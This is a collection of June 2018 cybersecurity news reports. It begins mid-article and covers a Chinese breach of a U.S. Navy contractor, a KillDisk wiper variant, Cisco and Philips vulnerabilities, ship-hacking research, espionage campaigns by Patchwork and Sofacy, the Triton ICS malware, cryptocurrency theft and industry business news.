“The Pentagon has requested or used more than $300 million for the project since late 2015 and has said it plans to start underwater testing by September.”

U.S. Navy chinese hackers

At the time, the U.S. Navy did not comment on the incident for security reason.

“There are measures in place that require companies to notify the government when a ‘cyber incident’ has occurred that has actual or potential adverse effects on their networks that contain controlled unclassified information.” said Cmdr. Bill Speaks, a U.S. Navy spokesman,

“it would be inappropriate to discuss further details at this time.”

“Evolving cyber threats are serious matters and we are continuously bolstering our cybersecurity culture by focusing on awareness of the cyber threat, and the adequacy of our cyber defenses and information technology capabilities,” he told AFP.

This incident is the last in order of time, Chinese hackers already stole in the past sensitive information from the US military such as the blueprint of the F-35 stealth fighter, the advanced Patriot PAC-3 missile system, and other highly secret projects.


Trend Micro spotted a new variant of KillDisk wiper in Latin America
9.6.2018 securityaffairs  
Virus

In May, experts at Trend Micro observed a new sample of KillDisk in Latin America, the malware infected the systems of a bank.
A new piece of the KillDisk wiper was observed spotted earlier this year targeting financial organizations in Latin America, Trend Micro reports.

The destructive malware was involved in the attacks against Ukraine’s grid in December 2015, the attack was attributed to a Russia-linked APT group tracked as BlackEnergy.

In December 2016, researchers at security firm CyberX discovered a variant of the KillDisk malware that implemented ransomware features.

In May, experts at Trend Micro observed a master boot record (MBR)-wiping malware in Latin America, the malicious code infected the systems of a bank with a severe impact on their operations.

According to the experts, the hacker failed the attack because the real goal was obtaining the access to SWIFT network.

“Last May, we uncovered a master boot record (MBR)-wiping malware in the same region. One of the affected organizations was a bank whose systems were rendered inoperable for several days, thereby disrupting operations for almost a week and limiting services to customers.” reads the analysis published by Trend Micro.

“Our analysis indicates that the attack was used only as a distraction — the end goal was to access the systems connected to the bank’s local SWIFT network.”

The malware researchers determined that the malicious code was a strain of the dreaded Killdisk due to on the error message displayed by the affected systems.

mbr-killdisk-latin-america

The analysis of the payload makes it difficult to determine the motivation behind the attack.

The experts analyzed a sample of that variant and discovered it was created with Nullsoft Scriptable Install System (NSIS), which is an open-source application used to create setup programs.

The sample was named by the author as “MBR Killer,” the sample included a routine to wipe the first sector of the machine’s physical disk.

The sample was protected by VMProtect, a tool used to prevent reverse engineering of the code in a virtualized environment.

The analysis of the sample did not reveal any connection to a command-and-control (C&C) infrastructure neither the presence of ransomware-like routines.

“We haven’t found any other new or notable routines in the sample we have. There is no evident command-and-control (C&C) infrastructure or communication, or ransomware-like routines coded into the sample. There are no indications of network-related behavior in this malware.” continues the analysis.

The malware wipes all physical hard disks on the infected system, it retrieves the handle of the hard disk and overwrites the first sector of the disk (512 bytes) with “0x00”, then forces the machine to shut down.

“The destructive capabilities of this malware, which can render the affected machine inoperable, underscore the significance of defense in depth: arraying security to cover each layer of the organization’s IT infrastructure, from gateways and endpoints to networks and servers,” concludes Trend Micro.

The report also included Indicators of Compromises (IoCs)


Cisco removed hardcoded credentials in WAAS software. Undocumented accounts are a frequent issue
9.6.2018 securityaffairs  
Vulnerebility

Cisco has removed hardcoded credentials that were in Cisco Wide Area Application Services (WAAS), which is a software designed to optimize WAN traffic management.
The hardcoded credentials (CVE-2018-0329) resides in the read-only SNMP community string in the configuration file of the SNMP daemon, they could be exploited by attackers to read any data that is accessible via SNMP on the affected device.

“A vulnerability in the default configuration of the Simple Network Management Protocol (SNMP) feature of Cisco Wide Area Application Services (WAAS) Software could allow an unauthenticated, remote attacker to read data from an affected device via SNMP.” states the security advisory published by Cisco.

“The vulnerability is due to a hard-coded, read-only community string in the configuration file for the SNMP daemon. An attacker could exploit this vulnerability by using the static community string in SNMP version 2c queries to an affected device.”

There are no workarounds that address this vulnerability.

The SNMP community string is hidden from administrators this means that there was no way to see the find the vulnerability during regular audits of the architecture.

The flaw was reported by the security researcher Aaron Blair while investigating the CVE-2018-0352 WaaS vulnerability, a flaw that affects the Cisco Wide Area Application Services Software Disk Check Tool that could lead privilege escalation.

“A vulnerability in the Disk Check Tool (disk-check.sh) for Cisco Wide Area Application Services (WAAS) Software could allow an authenticated, local attacker to elevate their privilege level to root. The attacker must have valid user credentials with super user privileges (level 15) to log in to the device.” reads the security advisory.

“The vulnerability is due to insufficient validation of script files executed in the context of the Disk Check Tool. An attacker could exploit this vulnerability by replacing one script file with a malicious script file while the affected tool is running. A successful exploit could allow the attacker to gain root-level privileges and take full control of the device.”

This CVE-2018-0352 vulnerability was a privilege escalation in the WaaS disk check tool, Blair exploited it to elevate his privilege to “root,” an access level that allowed him to discoverer the hidden SNMP community string inside the /etc/snmp/snmpd.conf file.

CISCO hardcoded credentials

Unfortunately, hardcoded credentials and undocumented accounts are not uncommon in Cisco appliance, the company addressed similar issues in the Prime Collaboration Provisioning (PCP), in the CISCO IOS XE operating system, and the Digital Network Architecture (DNA) Center.


Chinese Government Hackers Steal Trove of U.S. Navy Data: Report

9.6.2018 securityweek BigBrothers

Chinese government hackers have stolen a massive trove of sensitive information from a US Navy contractor, including secret plans to develop a new type of submarine-launched anti-ship missile, the Washington Post reported Friday.

Investigators told the newspaper that breaches were executed in January and February by a division of the Chinese Ministry of State Security, operating out of the Chinese province of Guangdong.

The contractor, which was not named in the report, works for the Naval Undersea Warfare Center, based in Newport, Rhode Island. It conducts research and development for submarines and underwater weapons systems.

According to the Post, hackers swiped 614 gigabytes of data that included information relating to sensors, submarine cryptographic systems and a little-known project called Sea Dragon.

The Pentagon has not said much about Sea Dragon, launched in 2012, except that it is aimed at adapting existing military technologies to new uses.

At the Navy's request, the Post withheld information about the compromised new missile system, but said it was for a supersonic anti-ship missile that could be launched from submarines.

Navy spokesman Commander Bill Speaks declined to confirm the Post report, citing security reasons.

"Evolving cyber threats are serious matters and we are continuously bolstering our cybersecurity culture by focusing on awareness of the cyber threat, and the adequacy of our cyber defenses and information technology capabilities," he told AFP.

Chinese hackers have for years targeted the US military to steal information and the Pentagon says they have previously swiped crucial data on the new F-35 stealth fighter, the advanced Patriot PAC-3 missile system and other highly sensitive projects.

News of the hack comes amid rising tensions between Beijing and Washington on a range of issues including trade and military matters.

The Pentagon last month pulled its invitation for China to join maritime exercises in the Pacific because of Beijing's "continued militarization" of the South China Sea.


Hackers Can Hijack, Sink Ships: Researchers
9.6.2018 securityweek  Hacking

Vulnerable ship tracker by Pen Test Partners

Insecure configurations and vulnerabilities in communications and navigation systems can allow hackers to remotely track, hijack and sink ships, according to researchers at penetration testing and cybersecurity firm Pen Test Partners.

In October 2017, Pen Test Partners presented its research into vulnerabilities affecting the satellite communications (satcom) systems used by vessels. The company has continued to analyze software and hardware used in the maritime industry and found that they are affected by serious flaws.

It has also created an interactive map that can be used to track vulnerable ships. The tracker combines data from Shodan with GPS coordinates and it can show vulnerable ships in real time. However, the company will only periodically refresh the data shown on the map in an effort to prevent abuse.

Satellite communications is the component that exposes ships to remote hacker attacks, as shown by Pen Test Partners last year and, at around the same time, by researchers at IOActive.

While there are some vulnerabilities in these systems themselves, the main issue is that many satcom terminals continue to use default credentials, allowing unauthorized users to gain admin-level access.

Many of the security holes disclosed this week by Pen Test Partners can be mitigated by setting a strong administrator password on the satcom terminal. Other serious issues discovered by researchers have been reported to Cobham, whose Fleet One terminal was used in experiments, and have not been disclosed.

According to researchers, once an attacker gains access to the terminal, they can replace the firmware due to the lack of proper validation checks or downgrade it to an older and more vulnerable version, and they can edit the web application running on the terminal. Experts also discovered poorly protected admin passwords in configuration files.

An even bigger problem, researchers warn, is that once an attacker gains access to the satcom terminal, they can move laterally to other systems. One of them is the Electronic Chart Display and Information System (ECDIS), which is used by vessels for navigation.

Since the ECDIS can be connected directly to the autopilot feature, hacking this system can allow an attacker to take control of a ship.

“We tested over 20 different ECDIS units and found all sorts of crazy security flaws. Most ran old operating systems, including one popular in the military that still runs Windows NT,” explained Pen Test Partners researcher Ken Munro.

In one case, the ECDIS had a poorly protected configuration interface that allowed an attacker to spoof the position of the GPS receiver on the ship and make the vessel “jump” to a slightly different location.

Reconfiguring the ECDIS can also allow an attacker to change the size of the targeted ship as seen by other nearby vessels via the automatic identification system (AIS) tracker.

“So, simply spoof the ECDIS using the vulnerable config interface, ‘grow’ the ship and ‘jump’ it in to the shipping lanes,” Munro explained. “Other ships’ AIS will alert the ship’s captain to a collision scenario. It would be a brave captain indeed to continue down a busy, narrow shipping lane whilst the collision alarms are sounding. Block the English Channel and you may start to affect our supply chain.”

Another attack scenario described by Pen Test Partners targets the operational technology (OT) systems on board a ship. These systems are used to control steering, engines, ballast pumps and other components, and they communicate via the NMEA 0183 protocol.

Since messages sent over NMEA 0183 don’t use any authentication, encryption or validation, a man-in-the-middle (MitM) attacker can modify the data and, for example, inject small errors that would cause the ship to alter its course when autopilot is engaged, researchers warn.

“The advent of always-on satellite connections has exposed shipping to hacking attacks. Vessel owners and operators need to address these issues quickly, or more shipping security incidents will occur. What we’ve only seen in the movies will quickly become reality,” Munro concluded.


Capgemini to Acquire Leidos Cyber
9.6.2018 securityweek  IT

French IT consultancy firm Capgemini announced Thursday an agreement to acquire Leidos Cyber from the U.S.-based Leidos. The acquisition is subject to anti-trust and Committee of Foreign Investment in the United States (CFIUS) approvals, and is expected to complete before the end of 2018. Financial terms have not yet been disclosed.

Founded in 1967, the Capgemini Group employs more than 200,000 people in more than 40 countries. It focuses on consulting, technology services and digital transformation; and reported global revenue of EUR 12.8 billion in 2017.

In terms of its heritage, a Capgemini spokesperson told SecurityWeek, "Leidos Cyber was formed through the mergers, since 2011, of Lockheed Martin’s corporate division, Industrial Defender and Leidos’ own commercial cybersecurity business."

Leidos was formerly known as Science Applications International Corporation (SAIC), which changed its name in 2013. A new SAIC was then spun off Leidos, retaining the original name. Leidos Cyber is the cybersecurity arm of Leidos Holdings, employing almost 500 cybersecurity professionals across the North America. Leidos reported 2017 revenues of $10.2 billion.

The products and services of the two organizations complement each other. Capgemini gives a global market to Leidos Cyber's services; while Leidos Cyber will give Capgemini a much stronger footing in the U.S.

"Leidos Cyber is a pioneer in the field of cybersecurity. It defined the market in protecting the industrial control ecosystem for the mission critical infrastructure needs of global enterprises," comments Paul Hermelin, Chairman and CEO, Capgemini. Leidos' core market comprises government and highly regulated industries.

"Its world class security expertise and status as a trusted advisor to many Fortune 500 leaders," continued Hermelin, "makes it totally complementary to Capgemini's global cybersecurity practice. It is the perfect fit to reinforce our cybersecurity practice in North America, to help meet the security requirements of our international client base."

Robert Meindl, president of Leidos Cyber, is also confident, calling Capgemini 'a natural home for our commercial cybersecurity team'. "Not only will we be able to play our part in augmenting the North America cybersecurity practice," he said, "but we also look forward to adding value to the global security provisions of Capgemini's clients around the world."

Angie Heise, president at Leidos Civil Group, added, "Capgemini's commitment to engaging a broad set of commercial markets makes it an ideal fit for the Leidos Cyber business."


Patchwork Cyberspies Target U.S. Think Tanks
9.6.2018 securityweek  CyberSpy

The cyber-espionage group known as "Patchwork" has been launching cyberattacks directly against United States-based think tanks, Volexity reveals.

Believed to be operating out of the Indian subcontinent and supposedly active since 2014, the threat group was previously observed targeting mainly government-associated organizations connected to Southeast Asia and the South China Sea.

After expanding its target list a couple of years ago, the group adopted new exploit techniques in late 2017, and also updated malware families in its arsenal earlier this year.

Also referred to as Dropping Elephant, Patchwork has shown an increase in activity recently, and also started using unique tracking links in their phishing emails, to identify which recipients opened their messages, Volexity has discovered.

The security firm observed three spear-phishing campaigns launched by the group, “leveraging domains and themes mimicking those of well-known think tank organizations in the United States.” The actors used articles and themes from the Council on Foreign Relations (CFR), the Center for Strategic and International Studies (CSIS), and the Mercator Institute for China Studies (MERICS) as lures, along with malicious Rich Text Format (RTF) documents.

The attacks shared the use of email recipient tracking, a linked RTF document, and the final payload, but various elements in each campaign were different, Volexity reports.

In one attack, the actors also used a domain name similar to the Foreign Policy Research Institute (FPRI), in a message supposedly coming from CFR. The spear-phishing emails contained links to files featuring the .doc extension, but which were in fact RTF documents attempting to exploit CVE-2017-8750 and execute code via a malicious scriptlet file embedded in the document.

The group apparently used publicly available exploit code from Github to deploy the freely available QuasarRAT.

Written in C#, the remote access tool (RAT) provides AES encryption of network communication, file management, the ability to download, upload, and execute files, keylogging, remote desktop access, remote webcam viewing, reverse proxy, and browser and FTP client password recovery, among other capabilities.

The malware achieves persistence by creating a scheduled task that points to the QuasarRAT binary (saved on disk as microsoft_network.exe). The scheduled task, named Microsoft_Security_Task, runs at 12:00 AM each day, then repeats every 5 minutes for 60 days.

When executed, the malware first attempts to determine the geographical location of the infected host, then starts beaconing over an encrypted connection to the command and control domain.

“The addition of US-based think tanks to the list of organizations in the crosshairs of Patchwork shows an increasing diversity in the geographic regions being targeted. While there were a few peculiar components to some of the spear phish messages, the campaigns and themes were strategically relevant to the organizations being targeted. The Patchwork threat actors also appear to have adopted a technique seen from other APT groups where they are now tracking the effectiveness of their campaigns by recording which recipients have opened the phishing message,” Volexity notes.


Nikesh Arora Takes Over as New CEO of Palo Alto Networks
9.6.2018 securityweek  IT

Nikesh Arora became the new CEO of Santa Clara, CA-based Palo Alto Networks (PAN) on Wednesday, June 6. He replaces existing CEO Mark McLaughlin, who will continue with PAN as vice chairman of the PAN board.

"Over the course of several quarters, I have been discussing succession planning with the Board and I couldn't be more pleased that we have found a leader in Nikesh," said McLaughlin, who has served as CEO since 2011.

Share price dipped slightly since the news became known at the beginning of the month, but at $197.07 (at the time of writing) it is still considerably up on the firm's 52-week low of $126.56. It has been suggested that the market is slightly wary of Arora's lack of cybersecurity experience. He is, however, a big business player with big business experience.

Nikesh Arora - chairman and CEO of Palo Alto Networks

Nikesh Arora - chairman and CEO of Palo Alto NetworksArora's former positions include chief business officer at Google (Fortune claims that Eric Schmidt once described him as "the finest analytical businessman I have ever worked with"); and COO at SoftBank (where he was 'heir apparent' to founder Masayoshi Son). He left SoftBank when Son decided to stay on for another decade. At Google, Fortune claims, "He helped instill discipline into the quirky Internet upstart, focusing its untamed energy into unstoppable commercial force."

Arora is not concerned about his personal lack of cybersecurity experience. "The good news is I knew nothing about advertising or ad sales when I joined Google in 2004 and I think that worked out," he told CNBC. In 2012, he was Google's highest paid executive. He expects to work closely with both McLaughlin and PAN founder and CTO, Nir Zuk. "I may not have a background in security, but with my background as an engineer, I can sit down with Zuk to help guide the next generation of products we can offer," he told recode.net.

Arora's pay package is impressive -- especially if he provides impressive growth to the company. His base salary is around $1 million per year, with a further $1 million as target bonus; plus $40 million of restricted stock vesting over seven years, and stock options valued at $66 million vesting in increments. "If the stock quadruples," reports Business Today, "he is in for a windfall -- he gets all of them." BT calculates this will amount to $128 million.

"We wanted to make sure that Nikesh, as the new leader of the company, has strong skin in the game," Asheem Chandna, a member of Palo Alto Networks' board of directors and investor at Greylock Partners, told Fortune. "And we wanted to make sure Nikesh is rewarded if he creates multiples of value for shareholders."

That leaves the question of how Arora will seek such dynamic growth for PAN. McLaughlin claims the transition from him to a new CEO has been planned for some time. He told CNBC that PAN is already focused on the new developing markets: cloud, machine learning and new-age software, and suggested that PAN will look very different in five years' time.

"In looking for the perfect person to do that, we wanted somebody who is a very demonstrated business executive at scale and would bring those key attributes to the table to take us where the company's going to be in five years."

"I'm hoping, as we go forward," added Arora, "we'll strike partnerships not just with Alphabet and Google but also with the other big players in the space, be it Microsoft or Amazon or many of our partners in the cybersecurity space." His intention is to apply the same principles of scale that he learned from his time at Google to Palo Alto Networks.


Cisco patches a critical vulnerability in Prime Collaboration Provisioning solution
9.6.2018 securityaffairs
Vulnerebility

Cisco fixed several flaws in the Prime Collaboration Provisioning product that allows customers to manage their communications services.
Cisco released security patches to address severe vulnerabilities in Prime Collaboration Provisioning (PCP) solution, one of the issues was rated as critical.

The vulnerabilities have been found by Cisco during internal security testing and there is no evidence of attacks exploiting the flaws in the wild.

The Prime Collaboration Provisioning is a web-based provisioning product that allows its customers to manage their communications services.

The critical vulnerability, tracked as CVE-2018-0321, could be exploited by a remote and unauthenticated attacker to access the Java Remote Method Invocation (RMI) system and perform malicious actions that affect both the PCP and the devices connected to the solution.

“A vulnerability in Cisco Prime Collaboration Provisioning (PCP) could allow an unauthenticated, remote attacker to access the Java Remote Method Invocation (RMI) system.” reads the security advisory published by Cisco.

“The vulnerability is due to an open port in the Network Interface and Configuration Engine (NICE) service. An attacker could exploit this vulnerability by accessing the open RMI system on an affected PCP instance. An exploit could allow the attacker to perform malicious actions that affect PCP and the devices that are connected to it.”

Cisco confirmed that there are no workarounds that address this vulnerability.

Cisco also reported five high severity vulnerabilities in the Prime Collaboration Provisioning solution, two of which could be exploited by an unauthenticated attacker to reset the password on vulnerable products and gain admin-level privileges by sending a specially crafted password reset request.

Another high severity vulnerability could be exploited by an unauthenticated attacker to execute arbitrary SQL queries. Cisco also fixed high severity access control vulnerabilities that could lead privileges escalation.

Customers need to update their Prime Collaboration Provisioning products by updating them to version 12.3.

The flaws have been identified by experts from Cisco during internal security testing.

Prime Collaboration Provisioning solution

Cisco also fixed an information disclosure bug in Meeting Server, and a DoS vulnerability that affects several products of the IT giant.


New KillDisk Variant Hits Latin America
8.6.2018 securityweek 
Virus

A new version of the destructive KillDisk malware was observed earlier this year targeting organizations in Latin America, Trend Micro reports.

KillDisk has been around for several years, and was used in attacks targeting Ukraine’s energy sector in 2015, orchestrated by the Russia-linked threat actor BlackEnergy.

Initially designed to wipe hard drives and render systems inoperable, the malware received file-encrypting capabilities in late 2016, with a Linux-targeting variant of the ransomware spotted shortly after.

In January, Trend Micro security researchers observed a new variant of the malware in Latin America, and revealed that the threat was once again deleting files and wiping the disk.

One of the attacks, the security firm reveals, was related to a foiled heist on the organization’s system connected to the SWIFT network (Society for Worldwide Interbank Financial Telecommunication).

In May, the security firm observed a master boot record (MBR)-wiping malware in the region, with one of the impacted organizations being a bank “whose systems were rendered inoperable for several days.” The attack, however, was deemed a distraction, as the actor behind it was in fact focused on accessing systems connected to the bank’s local SWIFT network.

The researchers also discovered that the malware used in this attack was a new variant of KillDisk, based on the error message displayed by the affected systems (common to machines infected with MBR-wiping threats).

“The nature of this payload alone makes it difficult to determine if the attack was motivated by an opportunistic cybercriminal campaign or part of a coordinated attack like the previous attacks we observed last January,” Trend Micro says.

The malware used in the May attack was created using Nullsoft Scriptable Install System (NSIS), with the actor purposely naming it “MBR Killer.” Analysis of the sample revealed a routine to wipe the first sector of the machine’s physical disk.

The security researchers also say they haven’t found other new or notable routines in the sample and that no command-and-control (C&C) infrastructure or communication were observed. Furthermore, no ransomware-like routines were found in the malware, nor network-related behavior.

The threat can wipe all of the physical hard disks on the infected system. To wipe the MBR, it retrieves the handle of the hard disk, overwrites the first sector of the disk (512 bytes) with “0x00”, attempts the same routine on all hard disks, then forces the machine to shut down.

“The destructive capabilities of this malware, which can render the affected machine inoperable, underscore the significance of defense in depth: arraying security to cover each layer of the organization’s IT infrastructure, from gateways and endpoints to networks and servers,” Trend Micro notes.


U.S. in Deal to Ease Sanctions on China's ZTE: Top Official
8.6.2018 securityweek IT

US officials reached a deal Thursday to ease sanctions which threatened to cripple Chinese smartphone maker ZTE, Commerce Secretary Wilbur Ross said.

Ross told CNBC television the deal includes a $1 billion fine levied on the Chinese firm and a requirement that it change its board of directors.

In April, the Chinese group was cut off from US technology products for violating US sanctions against North Korea and Iran -- measures which threatened to put ZTE out of business.

Ross said the agreement calls for "embedding a compliance department" chosen by Washington to monitor company conduct.

"They will pay for those people but the people will report to the new chairman," Ross said.

"This is a pretty strict settlement. The strictest and largest settlement fine that has ever been brought by the Commerce Department against any violator of export controls."

Ross said the plan calls for ZTE to create a $400 million escrow account in case of future violations, and a requirement to overhaul the board of directors and executive team within 30 days.

Several US lawmakers have warned against easing sanctions on ZTE, citing national security concerns.

But President Donald Trump last month said he was looking at options to prevent a shutdown of ZTE.

The news comes amid increasing trade tensions between Washington and Beijing, with Trump threatening to impose tariffs of Chinese technology products to reduce a large trade deficit.


Russian Cyberspies Change Tactics in Recent Campaign
8.6.2018 securityweek BigBrothers  CyberSpy

Recently observed attacks orchestrated by the Russian threat group Sofacy have revealed a change in tactics and new iterations of previously known tools, according to Palo Alto Networks researchers.

Also tracked as APT28, Fancy Bear, Pawn Storm, Sednit and Strontium, the cyber-espionage group has been associated with numerous attacks worldwide, including those targeting the 2016 presidential election in the United States, assaults on Ukraine and NATO countries, and attacks on targets in Asia.

Earlier this year, security researchers revealed that Sofacy’s campaigns overlap with other state-sponsored operations, and also dissected a new backdoor employed by the group. Dubbed Zebrocy, the new malware consists of a Delphi downloader and an AutoIT stage, ESET reported in April.

Now, Palo Alto reveals that a C++ version of Zebrocy has also been seen in attacks. Furthermore, the security researchers discovered Sofacy attacks that leveraged the Dynamic Data Exchange (DDE) exploit technique to deliver different payloads than before.

The campaign, Palo Alto says, breaks out of the previously observed patterns in that it no longer targets only a handful of employees within a single organization. Instead, the attackers sent phishing emails to “an exponentially larger number of individuals” within the target company.

“The targeted individuals did not follow any significant pattern, and the email addresses were found easily using web search engines. This is a stark contrast with other attacks commonly associated with the Sofacy group,” the security researchers explain.

Not only did the group launch a large number of Zebrocy attacks, but it also started using DDE to deliver payloads such as the Zebrocy backdoor and the open-source penetration testing toolkit Koadic (this is the first time it leverages this tool). Previously, the group used the DDE technique for the distribution of Seduploader.

As detailed in a February report, Palo Alto also discovered that the group was hiding infrastructure using random registrant and service provider information for each attack and that they deployed a webpage on each of the domains.

The artifact led to the discovery of an attack campaign using the DealersChoice exploit kit, as well as another domain serving the Zebrocy AutoIT downloader.

Eventually, this led to the discovery of the C++ variant of the Zebrocy downloader tool, as well as to “evidence of a completely different payload in Koadic being delivered as well.” The Delphi backdoor delivered as the final payload in Zebrocy attacks was found hosted at IP address 185.25.50[.]93, the researchers say.

From this command and control (C&C) IP, the researchers discovered another hard-coded user agent being used by Zebrocy. Several samples of the backdoor employing the user agent were observed targeting the foreign affairs ministry of a large Central Asian nation.

One other sample used a different user agent, which the researchers determined was from a secondary payload retrieved by the malware. The researchers eventually discovered over forty additional Zebrocy samples, several of which were targeting the same Central Asian nation.

Two weaponized Office documents leveraging DDE were used to target a North American government organization dealing with foreign affairs with the Zebrocy AutoIT downloader, and the previously mentioned large Central Asian nation, but with a non-Zebrocy payload this time, namely Koadic.

“Sofacy is carrying out parallel campaigns to attack similar targets around the world but with different toolsets. The Zebrocy tool associated with this current strain of attacks is constructed in several different forms based on the programming language the developer chose to create the tool. We have observed Delphi, AutoIt, and C++ variants of Zebrocy, all of which are related not only in their functionality, but also at times by chaining the variants together in a single attack,” Palo Alto concludes.


Triton ICS Malware Developed Using Legitimate Code
8.6.2018 securityweek ICS

The developers of Triton, a recently discovered piece of malware designed to target industrial control systems (ICS), reverse engineered a legitimate file in an effort to understand how the targeted devices work.

Triton, also known as Trisis and HatMan, was discovered in August 2017 after a threat group linked by some to Iran used it against a critical infrastructure organization in the Middle East. The malware targets Schneider Electric’s Triconex Safety Instrumented System (SIS) controllers, which use the proprietary TriStation network protocol. The malware leveraged a zero-day vulnerability affecting older versions of the product.Triconex controller targeted by Triton ICS malware

FireEye’s Advanced Practices Team has conducted a detailed analysis of the threat, which it describes as a malware framework, in an effort to determine when and how it was created.

The TriStation protocol is designed for communications between PCs (e.g. engineering workstations) and Triconex controllers. With no public documentation available, the protocol is not easy to understand, but it has been implemented by Schneider through the TriStation 1131 software suite.

It’s unclear how the attackers obtained the hardware and software they used to test the malware. They may have purchased it or borrowed it from a government-owned utility. The software could have also been stolen from ICS companies or other organizations that use Triconex controllers.

FireEye believes, however, that the malware developers did not build the TriStation communications component from the ground up. The company’s analysis suggests that the hackers copied code from legitimate libraries.

Specifically, researchers discovered significant similarities between the code found in the malware and code in a legitimate TriStation software file named “tr1com40.dll.”

While reverse engineering the legitimate DLL file may have helped them understand how TriStation works, the code in the malware suggests it did not answer all their questions. This may have led to the problems experienced by the threat group during its attack on the critical infrastructure organization.

Triton was discovered after it accidentally caused SIS controllers to initiate a safe shutdown. Experts believe the attackers had been conducting tests, trying to determine how they could cause physical damage.

“Seeing Triconex systems targeted with malicious intent was new to the world six months ago. Moving forward it would be reasonable to anticipate additional frameworks, such as TRITON, designed for usage against other SIS controllers and associated technologies,” FireEye said in its report. “If Triconex was within scope, we may see similar attacker methodologies affecting the dominant industrial safety technologies.”

Industrial cybersecurity firm Dragos reported recently that the threat group behind the Triton attack, which it tracks as Xenotime, is still active, targeting organizations worldwide and safety systems other than Schneider’s Triconex.


Serious Flaws Found in Philips Patient Monitoring Devices
8.6.2018 securityweek ICS

Researchers have discovered serious vulnerabilities in patient monitoring devices from Philips. The vendor has shared some recommendations for mitigating the risks until patches are made available.

A total of three flaws were identified by Medigate in Philips IntelliVue patient monitors (MP and MX series) and Avalon fetal monitoring systems (FM20, FM30, FM40 and FM50). Advisories describing the issues have been published by Medigate, Philips and ICS-CERT.

The most serious of them, based on its CVSS score of 8.3, allows an unauthenticated attacker to access memory and write to the memory of a targeted device. A similar flaw allows an unauthenticated attacker to read memory, but this issue has been assigned a severity rating of “medium.”Vulnerabilities found in Philips fetal monitoring system

Another high severity vulnerability is related to the devices exposing an “echo” service that can be leveraged by an attacker to cause a stack-based buffer overflow.

Vulnerabilities found in Philips fetal monitoring system

“The vulnerabilities allow a remote unauthenticated attacker to write memory on the device, which may allow remote code execution. Successful exploitation could open up a window for an attacker to read and/or write to the memory, which in turn could lead to a denial of service to the monitor, a breach of patient health information (PHI), as well as harm the integrity of the patient data,” Medigate said.

Philips expects to release patches in the second and third quarters of 2018. In the meantime, users have been advised to consult security and network configuration guides provided by the company to mitigate the risk.

“At this time, Philips has received no reports of exploitation of these vulnerabilities or incidents from clinical use that we have been able to associate with this problem, and no public exploits are known to exist that specifically target these vulnerabilities,” Philips said in its advisory.

The company also pointed out that exploiting these flaws requires “significant technical knowledge and skill,” and access to the local area network (LAN) hosting the affected devices.

Earlier this year, Philips informed customers that dozens of vulnerabilities affected the company’s IntelliSpace Portal, a visualization and analysis solution designed for healthcare organizations.


Cryptocurrency Theft Tops $1 Billion in Past Six Months
8.6.2018 securityweek Cryptocurrency

$1.1 billion has been stolen in cryptocurrency thefts over the last six months. This is the visible effect of an illicit dark web market economy which is reportedly worth $6.7 million. That market fuels cryptocurrency thefts from exchanges, businesses, and individuals; and the growing incidence of cryptojacking.

The basic problem is that cryptocurrencies are increasingly popular, which drives up their value. This makes investment popular for both individuals and businesses; and this in turn attracts the criminals. The three most common attacks involve currency-stealing malware (designed to quietly steal the users' wallet content and send it to the attacker); illicit mining (designed to use business infrastructures to mine cryptocurrency for the attacker); and cryptojacking (which is illicit mining targeted at individuals).

A six-month study (PDF) by Carbon Black into how cryptocurrency malware is bought and sold in the dark web has shown an estimated 12,000 dark web marketplaces selling approximately 34,000 offerings related to cryptocurrency theft. Malware offerings range from as little as $1.04 to as much as $1,000, with an average price of $224.

Bitcoin remains the primary cryptocurrency used for legitimate cyber transactions -- but cybercriminals are moving to alternative and more profitable currencies, such as Monero -- which is now used in 44% of all attacks. Cybercriminals are increasingly moving away from Bitcoin (for example, as ransomware payment) because the associated fees are high, and the transactions take too long to process. "These cybercriminals appear to prefer Monero due to privacy, non-traceability and comparatively low transaction fees," says the report.

This applies to both illicit mining and wallet theft. Ethereum is the second most popular criminal currency at 11%, with Bitcoin third at 10%. There is no direct correlation between the popularity of the currency among criminals, and the market capitalization of the currency. At the time the report was compiled, the top three currencies by capitalization were Bitcoin (around $180 billion), Ethereum (around $90 billion), and Ripple (around $40 billion).

Cryptocurrency exchanges are the most vulnerable targets. Carbon Black's research shows that during the period of analysis, 27% of all incidents involved exchanges. Exchanges combine the attraction of potentially large amounts of coin to steal, with user information for follow-on targeting by the same criminals (representing 14% of all crypto-currency related thefts).

In February 2018, Italy's BitGrail lost 17 million units of Nano (XRB) to hackers, valued at around $170 million. Coincheck in Japan had $530 million stolen in NEM (one of the lesser known currencies) in January 2018. In December 2017 South Korean Youbit filed for bankruptcy following two separate hacks -- one in April and one in December.

Just over one-in-five of all attacks are against businesses -- but most of these focus on the deployment of illicit crypto-mining malware where the victim infrastructure is used to quietly mine cryptocurrency. The same approach is also used against government websites, with Carbon Black finding that "nearly 7% of cryptocurrency attacks targeted various governments using the same tactics, techniques and procedures (TTPs) found in private industry attacks." In both cases, all proceeds are directed to the attackers' own wallets.

Closely related to this attack is 'cryptojacking' aimed at individual users. "Our research found that a growing number of websites are either intentionally deploying cryptocurrency scripts or are being used to deliver illicit mining malware to unsuspecting users. This is most commonly referred to as 'cryptojacking', and, even if you aren't being targeted for your own cryptocurrency, there's a chance your endpoint may be abused for someone else's gain."

Carbon Black expects cryptocurrency theft and illicit mining to continue to grow. "These cryptocurrencies represent an alternative and lucrative funding stream, which is especially true for criminals, as well as nation-states desperately seeking to subvert sanctions."

To deter such attacks, Carbon Black urges the use of endpoint protection software. For individuals, it also advises that users should avoid installing untrusted applications or following unfamiliar links; and that an ad-blocker should be used to "reduce the risk of having your device used to harvest cryptocurrency without your consent."

Businesses, urges Carbon Black, should store cryptocurrency in an off-line wallet. "Never," it stresses, "store your cryptocurrency in an online or warm wallet (a dedicated device that must be connected to the internet to make transactions). Cold storage is best."

To demonstrate the size of the problem, the company compares the cryptocurrency losses it found in six months ($1.1 billion) to the total cost of all cybercrime in the whole of 2016 ($1.3 billion -- according to the FBI).

Carbon Black filed for an IPO in April 2018 with plans to sell 8 million shares at $15 to $17. It raised this price to $19 and started trading on the NASDAQ on May 4, raising $152 million. At the time of writing, shares have risen to $26.10.


Google Won't Use Artificial Intelligence for Weapons
8.6.2018 securityweek Security

Google announced Thursday it would not use artificial intelligence for weapons or to "cause or directly facilitate injury to people," as it unveiled a set of principles for these technologies.

Chief executive Sundar Pichai, in a blog post outlining the company's artificial intelligence policies, noted that even though Google won't use AI for weapons, "we will continue our work with governments and the military in many other areas" including cybersecurity, training, and search and rescue.

The news comes with Google facing pressure from employees and others over a contract with the US military, which the California tech giant said last week would not be renewed.

